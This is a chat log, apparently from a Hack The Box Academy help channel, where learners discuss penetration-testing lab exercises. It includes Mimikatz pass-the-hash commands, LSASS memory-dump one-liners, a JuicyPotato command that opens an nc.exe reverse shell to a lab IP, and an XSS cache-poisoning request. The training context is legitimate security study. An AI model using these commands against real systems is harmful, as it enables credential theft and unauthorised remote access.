#modules
Explain please,since it is hacking WP module...
Useful info, thanks!
When I try to ssh to the IP HTB gives me from within the machine it just lags out.
Still having trouble with pass the hash question: "Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?" I ran the command "mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /rc4:30B3783CE2ABF1AF70F77D0660CF3453 /domain:. /run:cmd.exe" exit" and just got another shell with the same administrator access. How do I dump the hashes? Yesterday I did "sekurlsa::logonPasswords full" with mimikatz, but that is something I googled outside of the lesson. What methodology is intended based on the curriculum here? I feel like I'm missing something.
thats the command you need
mimikatz is a part of the curriculum
and googling about its possibilities is another
It seemed like a familiar command but I can't remember what module it was in previously.
its not
I was trying to go back and review
Well that makes me feel better
I thought I was taking a shortcut by using that command because it's something I googled. I thought there was another methodology that I was missing in the curriculum.
madf0x said it was taught in the module but i think he is missing it
Yeah, that's why I searched the previous modules.
pretty sure sekurlsa::logonPasswords is taught in cpts, can't remember which module it was tho
Thanks for the help. I just wish there was a flag to tell you that part of the solution is not included in the curriculum.
it is not
I looked pretty hard!
ah I see
either way there are multiple ways to dump LSASS, logonPasswords is just one of the more popular ways to do that
Crazy
?
Literally at the top of the PtH section
wdigest
i think you are missing the context
About the pth command?
I did that, it just gave me another shell of the same user.
I was trying to dump hashes.
I've got it though, thanks MarcieLee
I thought that the command was in a previous lesson, I ended up having to google it to find the sekurlsa::logonpasswords solution
pypykatz?
I almost tried that.
just try
I already got the hash, so I might come back and play around with that to practice later.
I just tried " sekurlsa::pth /user:David /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /domain:\DC01\ /run:cmd.exe" on the next question and I'm getting the same MS01 administrator shell.
for the next question:
Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.
why would you get a different shell than MS01
that command only gives you access to David network share
I just did the lsass dump from command line iirc
Is the command right? I can't get into DC01 share with "dir \dc01\david"
When doing the smb double backslash just wrap it in backticks
yea then you need to read it
It's been a hot minute since I did this module
huh
Domain Controller
does someone know how i can get 30 cubes?
Whatever this means
do you maybe know how i can get 30 cubes?
complete modules
Pay for them
yea but i dont have a credit card
HAHAHAA
Thank you!
remember smbclient commands
Ah, I'll try that too.
you connect to a share which in this case is \DC01\david but in this case you have to use absolute paths since you are not in an interactive console under the network share
its only a trick mimikatz does
actually the domain is inlanefreight.htb btw
DC01 is a security principal, in this case a computer (a special one called Domain Controller)
spoilers remove it please
.
double check the source you got and find out the naming scheme
On question: "Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt."
I ran the commands but did not get anything on my listener
Am I using the target IP for all of these?
I'm confused.
Am I supposed to have two RDP sessions open?
Is there another IP address I have to enumerate?
what section is it?
passthehash in password attacks
Am I supposed to use the IP from the lesson content?
yeah i cant get the source code back now
idk i cant remember been a few weeks since i did this module
im pretty sure its an ip u find on the domain
DC01 is supposed to connect to MS01, the machine you RDP'ed into, catch the shell with nc
the one in the top is just for rdp no?
skill issue??
started a netcat listener and then did this:
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command "powershell -e <base64 payload omitted>"
we dont need all the base64 here
I just want to make sure my shell is correct.
nah i got it lol
I did the same type of reverse shell as in the lesson and then used the IP from the target machine that I've been using for the whole lab
my eyes dont decode base64 up to today
nah
and I used port 8001.
the network is a 172 one
Yeah, I don't have that IP
ms01 and dc01 are connected through internal
Ipconfig
find it
I have a 10.129 one
problem -> solution
Provided by the lab
lmao
this technique works 100% of the time
Yes but when you sign in you have ways of finding it
@sly dome what do u mean naming scheme
the files are stored with a certain naming scheme under the folder you mentioned (the spoiler)
ahhhhhhh i see now thanks
any time
okay so I used ipconfig and found two ips, one was the one provided and one was a 172 ip that worked
still doesn't make sense though, how do I have two IPs?!
...
because the machine has two network interfaces
... did you do the foundation modules?
Networking is wild
Yeah, I did. What do those two IPs represent?
Wait till he realizes he has 2 networks on his vm when he does ip a
Different subnets
I'm also not sure what they're talking about when they say "the target machine, DC01, can only connect to MS01"
Yeah I understand IPs in that sense, I'm just trying to figure out why there would be two in this case on this machine. They only gave one in the lab
Because DC01 is only on the 172 subnet, ms01 is on the tunnel subnet and 172
I have 7 on my work computer lmao!
its like you are part of different and unrelated human communities
You can't directly get to DC01 from your attack machine, you need a middle man
the one they gave lets you connect to MS01, the other one is intranet with DC01 inside
tunnel subnet being the subnet of the IP I was given for the lab?
Yes the 10.x.x.x
Okay, makes sense now, wish that would have been explained in the module. Thanks for the clarification!
DC01 knows the way (route) to MS01 because they share a router in the 172 network
The 172.16.x.x is the internal network
yes it is sie
sir
but MS01 also has a 172 one
172 is usually like 172.14-16.x.x
we're calling it "172" because at least I dont remember the exact CIDR
Yeah I understand
Same
MS01 has 2 ips, DC01 has only 1
So I was connected to MS01 and got a reverse shell from DC01
Yes
Okay
it's configured like that because it is the same lab as the AD module
you can always redirect that to your local Parrot/Kali
So the 10.129 ip was just my VPN ip, in a real engagement there may only be the 172 correct?
in a real engagement can be all different
Love it
better understand the underlying of networking
Most networked systems have 2-3 ip, the higher up the chain the less it needs to reach out to delegate
Yeah, I think the confusion was that I was under the impression that the DC01 was also on my 10.129 network
so I had used that IP for my reverse shell
happens
nothing in the module triggered me to think about another ip
yes something did
I mean, seeing the 172 ip was confusing but I thought it was just an example
"the target machine can only connect to MS01"
meaning that target machine and you are in separate networks
Networked systems
Any time you need to interact with another machine from the initial system
and very patient
any time!
It's always a different ip
we have been where you are
before HTB I did the complete beginner and offensive pentesting modules on TryHackMe
networking is an abstract concept and can be hard to get
so that's pretty much my background besides Network+
HTB actually places a rather medium to high level in every content they deliver
I have server+
That one's not easy from what I hear!
which is good but it takes effort and time to be successful at HTB related stuff
hi. I don't get it. Why need a separate account for HTB main if I already had academy set up?
theyre working on SSO already
for now its what its
fair then
On the Getting Started module, Public Exploits section. I was able to use nmap with the version scan to see the open ports. now i am trying to find the right exploit within msfconsole but just missing something. the hint says search exploit plugin which i did but cannot find right one, any idea?
sorry, think i should ask this in the community help, my bad
no this is the right place for academy module stuff
you should search for the services and their version, use searchsploit like the example
i am trying that "searchsploit ssh 8.4"
but the hint part is throwing me off
Is there anyone that can help me with the Module: AD Enumeration & Attacks - Skill Assessment Part 2. Feel like I'm going crazy
Question about getting the administrator account on MS01. Question 8.
just ask
I'm on the SQL01 server as SYSTEM. I tried a bunch of different ideas and thought the best way to move to MS01 would be to capture the hash of the administrator now that I have SYSTEM and try to login with the access. I did this and cannot pass the hash, break the hash, etc.
Looking to know if I am in the wrong direction or if I'm doing something wrong
been a while since I've done that module, but enumerate the rights of the users you have credentials to
Alright, back to the drawing board. Thanks for the nudge
Got it, staring me in the face the whole time. Thank you!
Hello everyone, what are the personal instances on the HTB VIP+ subscription ?
Not the right place to ask lol vip+ is separate from academy
Yeah I just noticed that I am in the wrong place. Sorry
after making a post in community-help area, do we close it when done? i did but then it disappeared, wanted to check and thank you for the help @next bronze and @fathom pendant !
When you close it it basically hides it from active but it's still archived
hi im doing web proxies and doing the question
The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.
I really dont get it? i have tried getflag=true and GET /lucky.php?/getflag=true HTTP/1.1 dont get what im doing wrong
have you tried inserting path in ?=/path/flag.txt ?
You literally need to get lucky
Im not memeing
lmao
while true; do something; done | grep something
HELP on password cracking using mutations
under the AD module, ACL abuse: they are asking to add certain user to a group but the user is in the group already (???)
wtf?
Hi there, may I ask few questions:
- If I bought the silver plan (1 year) would I get 1 exam voucher per payment period or per year?
- Does it unlock all modules for free without the need of cubes?
Thanks lol
unless it's an exercise question, it's just an example of how to do it
its an exercise indeed
Work through the examples in this section to gain a better understanding of ACL abuse and performing these skills hands-on. Set a fake SPN for the adunn account, Kerberoast the user, and crack the hash using Hashcat. Submit the account's cleartext password as your answer.
i think every step is intended to get done
I checked my notes, I did it with PowerShell, never got an error message saying they're in it, but essentially the exercise part starts from adding the SPN
ok ok
but if you did it
why i dont have to ?
it should be the same scenario unless someone else is in the same lab as me and added it before i did
I just think they were always already added there, it's just that powershell doesn't throw an error while net rpc does
ahh okok
even in BloodHound its shown as an user of the group
and my BH data is from days ago
Hello I got stuck at Academy: Attacking Common Services | Attacking DNS, i got the subdomains but don't know where to go from here. Is there any tip? Thank you in advance
but the exercise itself starts from adding a fake SPN, just because a step is shown in the module, doesn't mean it must be repeated
I mean, is net rpc even in that section
nope
then the exercise is phrased just fine
my point is that they should state that the steps to reproduce are starting at the SPN part
its nothing related to the tool you use
you can reproduce the section without issues if you're using powershell
worked fine for me
okey then my lab is altered by somebody else
but is weird because my BH data is:
and this data is from 2 days ago
This is talking about adunn, not damundsen right
its talking about follow all the examples in the section
wdym?
one example is not doable at least in my lab since it is already done !
Work through the examples to gain understanding, but do it for adunn to complete the question. That's how I read it right now
Could be wrong
Find all entries
yea powerview
i should try resetting the lab at this point
but im confused a lot by what my bloodhound shows, that data was collected some days ago
you can just complete it, you clearly understand what's being done
thanks
i know but i am mad now
i will just ignore it
i get how its done
that's all
and there's always #858470491676737536, if it's legit a mistake, they can fix it
i will consider; thanks arth0s always a pleasure
not gonna lie, I've found some stuff and couldn't bother reporting them
same, but its fun to discover extra stuff and try to understand
Does HTB have sales on subscriptions?
Not usually, only ever real seen the occasional seasonal promo on silver annual but thats abt it
Ooo oki, I wonder if there will be one for Black Friday, it seems like a good deal
You can currently win a subscription
I am hoping, starting fresh on my journey for the sec+
Thanks :)
what takes longer: password attacks mutation section or DCSync attack over 2000 users domain?
HAHAHAHAHA

Honestly unless youre doing a password audit theres no reason to DCSync the entire DB
it is asking for certain cleartext password
i dont know the username
well, then you are indeed doing a password audit on the whole DB
So my point is still correct
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
maybe i can use that
to get the user(s) samaccountname
XD
so you already have the hash and just need the username?
but what do you HAVE
You skipped a part
Viewing an Account with Reversible Encryption Password Storage Set this?
Reversible encryption set is a specific setting
you can search for that setting to get the user
this
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
should be the same
Ye just saying what I have in my notes
Much easier than just DCSync the entire domain. Though it WOULD work too
yes it worked haha
since impacket separates a sep file for that permission
Getting an error on PtT module when trying to RDP with the supplied credentials: The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
I reset and tried /cert-ignore, and that did not work either.
thx for the collaboration mate
np
using command: xfreerdp /v:10.129.133.178 /u:Administrator /p:AnotherC0mpl3xP4$$ /dynamic-resolution
yea but you are using AnotherC0mpl3xP4
yes
Oh! got it. Thanks!
any time
That did the trick!
Hi I'm currently working on the "Firewall and IDS/IPS Evasion Hard-lab" in the NMAP enumeration module and I found a bunch of different ports but I don't know which to use for my --source-port #, and I searched online people specifically picking 53, is there reason behind that?
Like all the other ones it's also filtered, I'm confused on why specifically are people picking that port over the other ones
the victim host allows inbound connections coming from 53 for DNS reasons
it's explained in the module
Where at?
hey guys is there have any roadmap in hackthebox
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
hmm
I see what you meant, sorry I was just very confused on the wording thanks for your help
gotta remember that things like !,$,( etc are special characters that the bash terminal interprets before the application receives it
Can I pm you?
go for it
got stuck at Attack Enterprise Network - Lateral Movement. couldn't connect to MS01 via evil-winrm, tried both portfwd and reverse portfwd and get WinRMAuthorizationError
been following the walkthrough too
either your logon creds are bad or your user doesnt have perms
yea imma try harder ig
I can't F read lol 
Happens
Hi there, hoping someone can help me out with the Using CrackMapExec : Skill Assessment. I think I'm just doing something silly and can't get any accounts. I can find three hosts but when I try to brute force the rids, I don't get anything. I reckon I've configured something wrong in my hosts file or am missing a particular tag in my commands...any pointers?
can anyone help with attacking DNS?
hint same api as the one you found the uid
sure shoot me a dm if you still need help
what's the issue?
Ive been doing this question for so long and I found a HTB{} flag but when I put it in, it says its wrong
idek what to do anymore
shoot me a dm with that flag, i'll check it for y'all
ptt from linux password for user david is not working
I'm doing: ssh david@<ip> -p 2222
I have inlanefreight.htb in my /etc/hosts file with the appropriate IP as well
the domain at the end is a part of the username
lol, yeah I just saw that as I read further. I was trying to start the machine before I got into the lab material.
Just not used to that method. Should I take it out of my /etc/hosts?
i don't think that matter for this part but it could for some of the later attack on that section
I tried 19700 and 150
The list on the hashcat site is horrible!
Also, is there an easier way to find this?
I can't find AES-256 modes for hashcat or john
Looks like it should be 19700 based on https://hashcat.net/wiki/doku.php?id=example_hashes
why are you trying to crack that one
youve imported the keytab file, just use it to get a kerberos ticket
The question is asking for me to get credentials and then authenticate via SSH.
Is there a mode for that in john the ripper or hashcat?
Nevermind, there was another keytab file in the folder with an NTLM hash. Cracked it.
anyone do SeDebugPrivilege module recently? I logged into the box with the creds provided, but the user does not have the privileges for the attack
and it's asking me for a password
I thought the point of this was to avoid using a password.
<@&861185840277487616> 
Brother in idiocy there are FBI agents in this chat
This is actually facts
Hey all, does it matter if i run kali or parrot when doing the modules? is there anything linked to the parrot sec os to htb website? or will it be fine to use kali?
Whatβs the difference between fortresses and pro labs?
I get one is paid and one is rank based but what is fortress really doing different
If you have even a couple of braincells it will be fine
its the red role day
was just making sure, as i really didnt want to change os, wasnt sure if i needed it specifically to access the vms from it etc.
nah you good
sweet as cheers
hi im facing same problem, how u solve this ?
can u give me hint ?
Hi! I got stuck with Attacking Common Services, Attack DNS.
I found a few subdomains, but i dont know where to go from here. Tried dig without any luck. Can someone show me some direction?
DId you try running subrute?
yes
What did you get for a result?
Heyo! Anyone know how to reset bloodhounds db in the community edition?
Hi. Please can someone help me. I am doing the Getting Started Module and at the end of it, there is a Nibbles walkthrough. If I wanted to do this on my own parrot VPN, do I use openvpn with the academy VPN details OR the HTB main site VPN details (as the box is on the main site [I have a lab ovpn file as well as the starting point ovpn ). I am just unsure which one to use. Thank you
try inlanefreight.htb
did you write into all writeable shares?
that's the neat part, you don't
seriously, there's no official feature to clean the db yet
i tried
I'll dm
yes i put .scf file in b* folder
yes but when I restart the docker instance it keeps the db info, unless i remove it and readd I guess
Nvm i can't dm you
why?
alright i need to change my settings
you can, however, remove the docker volume, but don't blame me if it breaks something, works for me at least:
docker container ls
# find the container that ends with "graph-db-1"
docker container rm <that container>
docker volume rm $(docker volume ls -q | grep neo4j-data)
lmao bet Ill try that, good thing with docker is if it breaks I can always restart it
worst thing that can happen is you'll need to reinstall the whole thing I guess, but shouldn't be a big deal
i sent you a friend request
Thats interesting that bloodhound devs didnt account for this at all.
I don't remember the exact steps but put it into all writeable shares, then wait a while in responder, if you still don't see it, restart the target
yep I don't understand why this isn't some of the first features to be implemented, hopefully they will add that soon
solved, thanks
Hey Guy I didn't understand juicy-potato, maybe someone can explain it a bit better
how do I choose the COM server listening port??
in the module they just did -l 53375, but Y did they choose this one ??
I am 12 yrs don't ban me pls
cause when I do "netstat -ano" I C alot of ports
but when I choose some other it doesn't work
I'm doing the "Windows Privilege Escalation Skills Assessment - Part I"
What is this
I think I can use the juicy potato 4 escalation, but I need a listening port so || netstat -ano ||
but I get error
do U know?
ok I think I understand that I need to choose a CLSID, I just don't understand how am I supposed to choose...
Hi, I have a problem with MacOS module
https://academy.hackthebox.com/module/157/section/1522
I have to give the numeric version running on my machine but there is no lab on this module
(Except the usual parrot one)
Have I to make my own lab in order to do this module ?
each CLSID represents a service that can run as system, just need to find the right one as it can be different from system to system
yes but there r to many
got 1 that say :
[+] CreateProcessWithTokenW OK
not sure how 2 continue now
I don't have a mac but I've finished this module somehow, I think any version works?
if you have gui access, it should pop a system shell, if you don't, use nc to send a system shell to your listener
hmm funny, thanks
but that doesn't give me much
since I get the same user...
Hello, I'm not sure where I'm supposed to ask this question. I'm relatively new to HTB and wanted to clarify this small doubt.
I expected a result containing which port the IP was running on but I couldn't see any open ports in it.
(Scanning the Meow HTB)
I ran the command
nmap -F -Pn {ip}
I got
Host is up.
All 100 scanned ports on {ip} are in ignored states.
Not shown: 100 filtered tcp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds
Does anyone know how I could get the ports names listed?
Hi there, I have this POST Request
POST /upload.php HTTP/1.1
Host: 94.237.49.11:44931
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------413690872112659765123503892632
Content-Length: 51378
Origin: http://94.237.49.11:44931
DNT: 1
Connection: close
Referer: http://94.237.49.11:44931/
-----------------------------413690872112659765123503892632
Content-Disposition: form-data; name="uploadFile"; filename="pirate.jpg"
Content-Type: image/jpeg
ΓΏΓΓΏΓ JFIFHHΓΏΓC
I want to fuzz for possible allowed upload extensions in the Content-Disposition: Header.
I know how to do that using a Proxy. Does anyone know how to accomplish this using Ffuf?
I have tried something like this ffuf -X POST -u http://94.237.49.11:44931/upload.php -H 'Content-Disposition: form-data; name="uploadFile"; filename="testFUZZ' -H 'Content-Type: application/x-php' -d 'test' -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ but it did not work.
How does your full command look like?
|| cmd /c JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\Windows\Tasks\nc.exe 10.10.15.75 1234 -e cmd.exe" -t * ||
but on the VM I get the same user ...
a bit pointless
try running potato directly .\JuicyPotato.exe
You didn't specify here the clsid
||cmd JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\Windows\Tasks\nc.exe 10.10.15.75 1234 -e cmd.exe" -t * -c "{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}"||
I can't send picture but it's the same user...
what error are you getting? and what shell do you have that you can't run the potato directly but need to use cmd JuicyPotato.exe
can I DM?
sure
Module: File Inclusion
Session: Basic Bypass
On approved paths, it says "Some web applications may also use Regular Expressions to ensure that the file being included is under a specific path. For example, the web application we have been dealing with may only accept paths that are under the ./languages directory"
How should I locate accepted paths for the web app? From the examples in the session, I do not get the same output that are in the examples.
You can explore/crawl the website for valid paths or use a directory busting tool like dirsearch,feroxbuster,gobuster to enumerate valid directories in the same path then use the valid directory before your directory traversal payload
You don't even need to do that though for the example
ah thx. SHould have thought about that
yeah figured that out when I just looked at the URL. Pay attention to the details ^^
Hi how do I learn?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Hi would someone be able to help me out with File Upload Attacks - Skill Assessment?
Just a little stuck
Where exactly?
I need reverse engineer or Crypto skilled player and located or can to travel to saudi arabia to attend the blackhatmea finals
DM Me
hey friends, i am almost there, i am at Attacking Enterprise Networks - Web Enumeration & Exploitation, i am not getting the cookie, but getting this response, any hint??
Could you show the JS payload?
Can someone explain the fortress labs and what is the difference between them and pro labs
If I'm in the wrong area lmk
I get you need points for fortress but they seem like an earned version of pro labs instead of paid
Were you able to get it?
I didn't have time to read your last message
idk why it got deleted, give me a minute please
first, i tried having the file script.js as in the pic, with this payload
Pro Labs you need to pay for. you can only get access to them via a subscription.
Fortresses you get with i believe the Hacker rank on HTB.
you need to verify your account to see access to the channels for these. #welcome
Ok I will one last question, other than pay vs earn strategy, are these the same?
Im talking actual lab time and lab experience im not seeing the difference e
then i tried this payload , and got this
Ah I see
not really... Pro Labs are multiple machines (i.e. you're attacking a network).
i believe Fortresses are just single machines.. like Akerva mainly just focuses on web attacks
Ah there we go that makes sense
Just a private earned single machine
Got it thanks buddy
pretty sure they're not private
Private to those that didn't earn the rank hehe
So the script tag you inject should be using the src= to grab the script.js hosted on your machine. The script.js will have the code that will send the cookie
and Hacker rank unlocks 4 of them which are retired, the remaining three require Guru rank for some reason
shared you mean?
huh? all Fortresses can be done with the Hacker rank
I need to put on my big boy pants and actually do an active box. That is not retired so I can earn points.
yes shared
oh lmao, I'm sorry, I was thinking Endgames for some reason
yes, but it didnt work
too many things 
I meant endgames
Single machine too?
Yes it is
@rustic sage Endgames are good as well.. they're like Pro Labs but a lot smaller... you need to be Guru to unlock them or buy VIP and get access to the retired ones only.
Ok endgame is a smaller free but rank earned lab got it
:wipes brow: man that's confusing
Hm. I think I used xmlhttprequest payload for my script.js when I did it blind. Didn't try the HTB guide payload
It looks like the HTB guides payload should work though
Endgames aren't free, unless you pwn a lot of active machines and achieve Guru.
machines + many, many challenges
with 150+ active challenges, it's just not doable tbh, but that's probably a skill issue on my side
Don't say that
There's many that can't do it all
It's called life and responsibility
Dudes that are top 10 on hTB
Jk
The "Limited File Uploads" module gets you there.
it worked now for some reason, thank you so much for your time
No problem. Glad you got it!!
have great day
You too. Congrats on getting to the end and good luck on the exam!
Hey peeps... I must be doing something wrong but I can't get the right answer to What is the CVSS score of the public vulnerability CVE-2017-0144?
https://academy.hackthebox.com/module/75/section/763
I've tried every different way I can think of to give the answer but it's always wrong
try looking up the score for cvss version two instead of three
Well... there you go
was the easiest way to URL encode a base64string?
probably cyberchef or any url encoder you can find online
In burp CTRL+U the selected string. Or the encoder tab
I like to use CyberChef as well for encoding
hmm
Attacking SQL Databases.
Cannot having responder to work to get the hash. Any advices?
ON the File Inclusion Module > Once you have base64 encoded your web shell it says "we can URL encode the base64 string"
I got the same base64 string: PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==
But when I URL encode it, i dont get the same output as the in the session, hence I'm not able to utilize it.
Any idea what I might be doing wrong here?
Hit that encode special characters
Hello, I am stuck in XSS Phishing section, I want to remove the image input and bad icon
How can I do?
Hacking WordPress --> skill assessment --> + 1 Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
I've looked through the plugins but did not find a flag like thing. Any nudge that can help me to finish this module? Got all the other questions
try escaping "<img src" before adding your script
Hi , I try to use "> to escaping but failed. Could you give me some hint?
try '>
Yes, It can work but I don't know why.. Could you tell me the reason? Thanks!
not sure. Had same issue yesterday and it worked for me
Double quote is probably a bad character that's getting encoded. Notice " is getting replaced with &quot; which is the encoded form of "
umm.. I found when I'm using "view-source" in FireFox it displays a single quote
But if using F12 to see it display Double quote
Not sure if someone already replied you but for my case, I put it in the wrong writable folder. Probably need to look for other writable shared folders.
If anyone... I've checked all the plugins mentioned by WPScan but no results yet...
I don't remember this exactly, but there are other ways other than wpscan to enumerate plugins
see if you missed something.. that or research online the plugins and their versions
Only way I could think of is exploiting them one by one... trying that right now
wpscan indeed lists some CVEs and one of them is what you need
Almost all of them done, a lot of info but no downloaded file that contains a flag.
the CVE is exactly "unauthenticated file download"
found it! But not in the results from WPscan, it was Google that gave me the result when i searched for "unauthenticated file download"
Thanks!
did you enumerate all plugins with wpscan?
also a good lesson to never fully rely on automated tools
Gotta zone transfer to the right one
did you use a wpscan token?
that is essential
Yes
I got it with wpscan
SMTP module : Module teaches to use ||telnet <ip> <port>|| all that I have received is || Trying <ip> followed by "telnet: Unable to connect to remote host: No route to host"|| any ideas?
I assume you're using <ip> as a placeholder for the 10.x.x.x ip the module gives you? Are you connected to the vpn?
yes and yes
So you're doing telnet $ip $port (you do need to specify port)
the exact syntax that I ran was ||telnet 10.129.75.25 25||
If you do ip a you only have 1 tun connection yeah?
yeah I only see one
but can you ping the machine? the error is no route to host
I was able to run the nmap scan and get results, I don't know if there's a difference in that and ping but I'll give it a try quick
I'm just basing my advice on the provided error
I had to restart it a couple of times, but it eventually worked, thanks
how do I find the name on the SMTP server, I'm a little lost... can anyone give me a nudge?
Like a username? Use the VRFY, RCPT TO or EXPN to enumerate users. You can make a bash script to run through a list of names. There's also a tool that can be used to automatically enumerate SMTP users using a specified method. Smb-user-enum I believe
cool thanks
Smtp-user-enum
Right lol
Is anyone able to help me with the SQLMap Essentials skill assessment? I have searched far and wide but can't seem to find the injectable spot. Thought it might be in the search feature but alas that does not work.
Edit: found it, but goodness me that is a well hidden spot. My advice to the next person: Act as though you wanted to buy something
Can anyone let me know how long it takes to get the reset password email? I've been waiting awhile.
has anyone gotten a vbox kernel error
I was doing a windows priv esc module and now I'm getting this error
Ya, someone already replied, thanx
Guys, can I ask you about this question: It's Pass The Ticket from Linux
Use the LINUX01$ Kerberos ticket to read the flag found in \\DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
I connected to SMB using the keytab file but I tried to transfer the keytab file to my machine to authenticate as LINUX01$ but didn't succeed.
Is this possible and was getting the file through smbclient the correct way to go?
it's possible if you tunnel the traffic through the pivot
How did you manage it? I'm really stuck with this, could you help me?
Module: File Inclusion
Session: Remote File Inclusion.
What is the syntax needed to navigate among the dir? A little bit stuck on the navigation part
Why do you not just get a reverse shell?
just change commands
Could try. Just trying to follow along with the section
in the screenshot you're showing using ls / which is doing the ls command on the root (/) directory
try changing up the commands or maybe the question offers a suggestion where to look
ls+/
this gave no response
I'm with you so far
my problem is I get no result when trying to look in a different dir. I think I might be using the wrong input
Hello, can someone help me with the DNS part of "Attacking Common Service"? I don't get how to brute force subdomains
try ls%20//
can someone explain or provide the answer for this working with ids/ips skill assessment There is a file named wannamine.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the Overpass-the-hash technique which involves Kerberos encryption type downgrading. Replace XX with the appropriate value in the last content keyword of the rule with sid XXXXXXX within the local.rules file so that an alert is triggered as your answer.
What have you tried?
I've tried changing the content XX with the SID and checked but no alarms were triggered
You only have to replace the last two XX with the last two numbers of the SID
yeah I did but still no alarms were triggered
Then you have probably used the wrong SID
hey @acoustic owl i made a grave error in thinking i could simply just pick back up where i left off in ad enum and attacks LMAO spent 10 minutes figuring out my Skill issue
Haha, what do you need help with?
attaining monner
i figured it out (I forgot to tell the query to also look for the object to be a person)
I figured I needed to make the query = 2 for the account disabled bit
where is 999999 given?
in the local.rules wannamine.pcap sid
Look on the bright side. You certainly won't make this mistake a second time
Take another look at the SID.
You do not have to adjust the SID. You have to adjust the rule with this SID.
You have to adjust the content
Hi, can we create a dump file using cmd.exe and PID?
yeah i have changed the content xx with 99
No, SID is not content
I had to guess the account name the first time because I forgot to add the filter for the samaccountname
so what do I have to replace xx with? I have been trying for the past 2 days, please let me know
DM
Gitlab - Discovery & Enumeration
if you have sufficient privs, yes
can you tell me the command for it please?
The module only mentions powershell command using rundll32
yeah, because that works without having to transfer procdump over, what's wrong with that approach?
it only works for powershell I guess. I just wanted to know any alternatives for notes purpose
powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id C:\users\public\lsass.dmp full
you can run this in cmd
Thanks
or
procdump.exe -accepteula -ma lsass.exe lsass.dmp
but you'll need to transfer procdump to the target
ok thanks
Can someone help? I am stuck on this one. I am not sure why I cannot share a screenshot on here as well
SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.
Question... if I'm looking to transfer a file from a windows box using powershell to my Kali box. How can I do that? I can't use scp and only like net use or smb. Does anyone know and can share the commands? I've tried net use \ip of Kali /home/kali/my share but doesn't seem to work. I get a network name not found error. I as
for smb you can use impacket's smbserver, for http you can use psupload, there are a ton of ways
Okay... I'll try those two ways instead - thanks @next bronze
with smb you don't need net use, just use it like a network drive
cp file \\10.0.0.1\share\
@next bronze and on my Kali machine I setup the server to listen/receive?
correct
Ok cool ty
yeah I'm a fan of smbserver for uploading to attacker
with impacket's smbserver there's the added benefit of stealing whoever is connecting's hashes, could be useful sometimes
yup
Anyone else had any issues with spawning the target for Attacking Common Applications->Other Notable Applications? It's been about 10 minutes and nothing has spawned.
Is anyone else having issues spawning lab targets?
Trying to work on the medium footprinting lab and the target just sits:
Tried other previous labs. Same thing. Even on a different browser and computer.
ah good, it's not just me.
Yep, same here
Targets in regular HTB are working fine. Seems to be limited to academy targets?
Main htb and academy are separate networks technically speaking
I figured as much. Wanted to see just in case as a troubleshooting step in making sure the issue isn't on my end.
Looks like it's working again
Yep, all good here too.
Hello, I was wondering if somebody is new to hacking and if u want to be taught message me [and mods/owners don't ban me I won't teach the professional hacks just wifi]
If you don't have permission it's still illegal
Hi all. Please, help me with the ABUSING HTTP MISCONFIGURATIONS module with the first task (yes, the first task of the module in the chapter Identifying Unkeyed Parameters). I've been trying to solve it for the second week now and have tried a bunch of different complex tests, but the result is the same, I don't get the flag. And it seems to me that I'm doing something wrong and I just don't understand what it is anymore. I started doing it again step by step like in the module, but it still ends in failure.
Steps I followed:
- Sent a cache poisoning request using XSS via the ref parameter.
||GET /index.php?language=de&ref=%22%3E%3Cscript%3Eyour_script_XSS%3C/script%3E HTTP/1.1||
- Received a response with X-Cache-Status: HIT, which indicates that the request was cached.
- After the first step, the next request is sent immediately, which activates my XSS script at /admin.php?reveal_flag=1.
||GET /admin.php?reveal_flag=1 HTTP/1.1
Referer: http://webcache.htb/index.php?language=de&ref="><script>your_script_XSS</script>||
- I tried to look at the answer in several tabs and quickly go to other tabs to activate the load through the transition, everything is hopeless. I just beg you, help, 2 weeks on one question is too much
hello there, have you confirmed that the ref parameter is vulnerable to reflected XSS? Or did you just repeat the module?
recommended confirm the XSS first with a basic alert() payload
I don't understand how to do that
The flag will print in the banner upon successful login on the host via SSH.
I'm logged in, but didn't get any message
Skills Assessment - INTRODUCTION TO WINDOWS COMMAND LINE
@acoustic owl I'm probably being real dumb but I cracked the password for the account for Question one of Kerberoasting from Linux in the AD Enum module but I'm drawing a blank for how to authenticate with it. I'm probably overlooking something super simple though
hey! i have to ask a question about the "Attacking Applications Connecting to Services" section in "Attacking Common Applications".
